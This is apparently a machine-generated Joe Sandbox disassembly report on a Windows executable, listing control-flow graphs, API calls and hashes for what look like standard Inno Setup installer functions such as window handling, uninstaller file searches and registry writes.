                                                                                                      control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1798 423cec-423cf1 1792->1798 1799 423c8d 1792->1799 1819 423c63-423c6b 1793->1819 1820 423c70-423c72 1793->1820 1800 423cf3 1798->1800 1801 423d27-423d2c 1798->1801 1802 423c93-423c96 1799->1802 1803 423d50-423d60 1799->1803 1809 423fb1-423fb9 1800->1809 1810 423cf9-423d01 1800->1810 1804 423d32-423d35 1801->1804 1805 42409a-4240a8 IsIconic 1801->1805 1811 423cc5-423cc8 1802->1811 1812 423c98 1802->1812 1807 423d62-423d67 1803->1807 1808 423d6b-423d73 call 424194 1803->1808 1813 4240d6-4240eb call 424850 1804->1813 1814 423d3b-423d3c 1804->1814 1815 424152-42415a 1805->1815 1824 4240ae-4240b9 GetFocus 1805->1824 1821 423d78-423d80 call 4241dc 1807->1821 1822 423d69-423d8c call 423b84 1807->1822 1808->1815 1809->1815 1816 423fbf-423fca call 4181e0 1809->1816 1825 423f13-423f3a SendMessageA 1810->1825 1826 423d07-423d0c 1810->1826 1817 423da9-423db0 1811->1817 1818 423cce-423ccf 1811->1818 1827 423df6-423e06 call 423b84 1812->1827 1828 423c9e-423ca1 1812->1828 1813->1815 1831 423d42-423d45 1814->1831 1832 4240ed-4240f4 1814->1832 1829 424171-424177 1815->1829 1816->1815 1878 423fd0-423fdf call 4181e0 IsWindowEnabled 1816->1878 1817->1815 1841 423db6-423dbd 1817->1841 1842 423cd5-423cd8 1818->1842 1843 423f3f-423f46 1818->1843 1819->1829 1820->1792 1820->1793 1821->1815 1822->1815 1824->1815 1836 4240bf-4240c8 call 41eff4 1824->1836 1825->1815 1844 423d12-423d13 1826->1844 1845 42404a-424055 1826->1845 1827->1815 1837 423ca7-423caa 1828->1837 1838 423e1e-423e3a PostMessageA call 423b84 1828->1838 1847 424120-424127 1831->1847 1848 423d4b 1831->1848 1858 4240f6-424109 call 4244d4 1832->1858 1859 42410b-42411e call 42452c 1832->1859 1836->1815 1891 4240ce-4240d4 SetFocus 1836->1891 1855 423cb0-423cb3 1837->1855 1856 423ea5-423eac 1837->1856 1838->1815 1841->1815 1861 423dc3-423dc9 1841->1861 1862 423cde-423ce1 1842->1862 1863 423e3f-423e5f call 423b84 1842->1863 1843->1815 1851 423f4c-423f51 call 404e54 1843->1851 1864 424072-42407d 1844->1864 1865 423d19-423d1c 1844->1865 1845->1815 1849 42405b-42406d 1845->1849 1882 42413a-424149 1847->1882 1883 424129-424138 1847->1883 1866 42414b-42414c call 423b84 1848->1866 1849->1815 1851->1815 1873 423cb9-423cba 1855->1873 1874 423dce-423ddc IsIconic 1855->1874 1875 423eae-423ec1 call 423b14 1856->1875 1876 423edf-423ef0 call 423b84 1856->1876 1858->1815 1859->1815 1861->1815 1879 423ce7 1862->1879 1880 423e0b-423e19 call 424178 1862->1880 1906 423e83-423ea0 call 423a84 PostMessageA 1863->1906 1907 423e61-423e7e call 423b14 PostMessageA 1863->1907 1864->1815 1867 424083-424095 1864->1867 1884 423d22 1865->1884 1885 423f56-423f5e 1865->1885 1903 424151 1866->1903 1867->1815 1892 423cc0 1873->1892 1893 423d91-423d99 1873->1893 1899 423dea-423df1 call 423b84 1874->1899 1900 423dde-423de5 call 423bc0 1874->1900 1922 423ed3-423eda call 423b84 1875->1922 1923 423ec3-423ecd call 41ef58 1875->1923 1916 423ef2-423ef8 call 41eea4 1876->1916 1917 423f06-423f0e call 423a84 1876->1917 1878->1815 1924 423fe5-423ff4 call 4181e0 IsWindowVisible 1878->1924 1879->1866 1880->1815 1882->1815 1883->1815 1884->1866 1885->1815 1890 423f64-423f6b 1885->1890 1890->1815 1908 423f71-423f80 call 4181e0 IsWindowEnabled 1890->1908 1891->1815 1892->1866 1893->1815 1909 423d9f-423da4 call 422c4c 1893->1909 1899->1815 1900->1815 1903->1815 1906->1815 1907->1815 1908->1815 1937 423f86-423f9c call 412310 1908->1937 1909->1815 1935 423efd-423f00 1916->1935 1917->1815 1922->1815 1923->1922 1924->1815 1942 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1924->1942 1935->1917 1937->1815 1946 423fa2-423fac 1937->1946 1942->1815 1946->1815
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                      • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                      • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                                      • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2187 4675b4-4675bb 2181->2187 2182->2187 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2187->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2187->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2329 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2329 2321->2329 2347 467bb6-467bd1 2329->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2329->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2431 467f40-467f53 call 4145fc 2428->2431 2432 467f3d 2428->2432 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2431->2429 2432->2431 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2535 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2535 2536 4683d1-4683ee call 44ffdc call 450138 2532->2536 2549 468453 2535->2549 2550 46843b-468442 2535->2550 2536->2535 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2557 46846f-468478 2554->2557 2558 46847a-46847c 2554->2558 2556 468480-46849a 2555->2556 2559 468543-46854a 2556->2559 2560 4684a0-4684a9 2556->2560 2557->2555 2557->2558 2558->2556 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2587 468584-468598 call 403494 2563->2587 2588 468575-468582 call 47c440 2563->2588 2572 4685f0-4685f9 2564->2572 2576 4685ff-468617 call 429fd8 2572->2576 2577 468709-468738 call 42b96c call 44e83c 2572->2577 2589 46868e-468692 2576->2589 2590 468619-46861d 2576->2590 2606 4687e6-4687ea 2577->2606 2607 46873e-468742 2577->2607 2602 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2587->2602 2603 46859a-4685a5 call 403494 2587->2603 2588->2602 2596 468694-46869d 2589->2596 2597 4686e2-4686e6 2589->2597 2598 46861f-468659 call 40b24c call 47c26c 2590->2598 2596->2597 2604 46869f-4686aa 2596->2604 2609 4686fa-468704 call 42a05c 2597->2609 2610 4686e8-4686f8 call 42a05c 2597->2610 2663 46865b-468662 2598->2663 2664 468688-46868c 2598->2664 2602->2572 2603->2602 2604->2597 2614 4686ac-4686b0 2604->2614 2617 4687ec-4687f3 2606->2617 2618 468869-46886d 2606->2618 2616 468744-468756 call 40b24c 2607->2616 2609->2577 2610->2577 2622 4686b2-4686d5 call 40b24c call 406ac4 2614->2622 2641 468788-4687bf call 47c26c call 44cb0c 2616->2641 2642 468758-468786 call 47c26c call 44cbdc 2616->2642 2617->2618 2625 4687f5-4687fc 2617->2625 2626 4688d6-4688df 2618->2626 2627 46886f-468886 call 40b24c 2618->2627 2673 4686d7-4686da 2622->2673 2674 4686dc-4686e0 2622->2674 2625->2618 2636 4687fe-468809 2625->2636 2634 4688e1-4688f9 call 40b24c call 4699fc 2626->2634 2635 4688fe-468913 call 466ee0 call 466c5c 2626->2635 2656 4688c6-4688d4 call 4699fc 2627->2656 2657 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2627->2657 2634->2635 2682 468965-46896f call 414a44 2635->2682 2683 468915-468938 call 42a040 call 40b24c 2635->2683 2636->2635 2644 46880f-468813 2636->2644 2684 4687c4-4687c8 2641->2684 2642->2684 2655 468815-46882b call 40b24c 2644->2655 2679 46885e-468862 2655->2679 2680 46882d-468859 call 42a05c call 4699fc call 46989c 2655->2680 2656->2635 2657->2635 2663->2664 2675 468664-468676 call 406ac4 2663->2675 2664->2589 2664->2598 2673->2597 2674->2597 2674->2622 2675->2664 2701 468678-468682 2675->2701 2679->2655 2694 468864 2679->2694 2680->2635 2696 468974-468993 call 414a44 2682->2696 2715 468943-468952 call 414a44 2683->2715 2716 46893a-468941 2683->2716 2692 4687d3-4687d5 2684->2692 2693 4687ca-4687d1 2684->2693 2700 4687dc-4687e0 2692->2700 2693->2692 2693->2700 2694->2635 2711 468995-4689b8 call 42a040 call 469b5c 2696->2711 2712 4689bd-4689e0 call 47c26c call 403450 2696->2712 2700->2606 2700->2616 2701->2664 2706 468684 2701->2706 2706->2664 2711->2712 2730 4689e2-4689eb 2712->2730 2731 4689fc-468a05 2712->2731 2715->2696 2716->2715 2720 468954-468963 call 414a44 2716->2720 2720->2696 2730->2731 2734 4689ed-4689fa call 47c440 2730->2734 2732 468a07-468a19 call 403684 2731->2732 2733 468a1b-468a2b call 403494 2731->2733 2732->2733 2742 468a2d-468a38 call 403494 2732->2742 2741 468a3d-468a54 call 414b18 2733->2741 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2749 468a5f-468a68 2746->2749 2750 468a6a-468a74 call 42b0e4 2746->2750 2752 468a99-468abe call 403400 * 3 2747->2752 2749->2750 2753 468a79-468a88 call 414a44 2749->2753 2750->2753 2753->2752
                                                                                                      APIs
                                                                                                        • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                        • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                        • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                        • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                        • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                        • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                        • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                        • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                        • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                        • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                        • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                        • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                        • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0216FC14,02171974,?,?,021719A4,?,?,021719F4,?), ref: 004683FD
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                        • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                      • String ID: $(Default)$STOPIMAGE$%H
                                                                                                      • API String ID: 3231140908-2624782221
                                                                                                      • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                      • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                      • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                      • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID: unins$unins???.*
                                                                                                      • API String ID: 3541575487-1009660736
                                                                                                      • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                      • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                      • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                      • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 873889042-0
                                                                                                      • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                      • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                      • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                      • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(000003C5,0046E17A), ref: 0046E0EE
                                                                                                      • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,000003C5,0046E17A), ref: 0046E10A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstanceVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 1462612201-0
                                                                                                      • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                      • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                      • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                      • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                      • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                      • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                      • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
• Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
APIs
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
• Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
• Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

Control-flow Graph (function at 0046F058): rendered graph and basic-block list omitted; legend: Executed / Not Executed

APIs
  • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
  • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
• RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
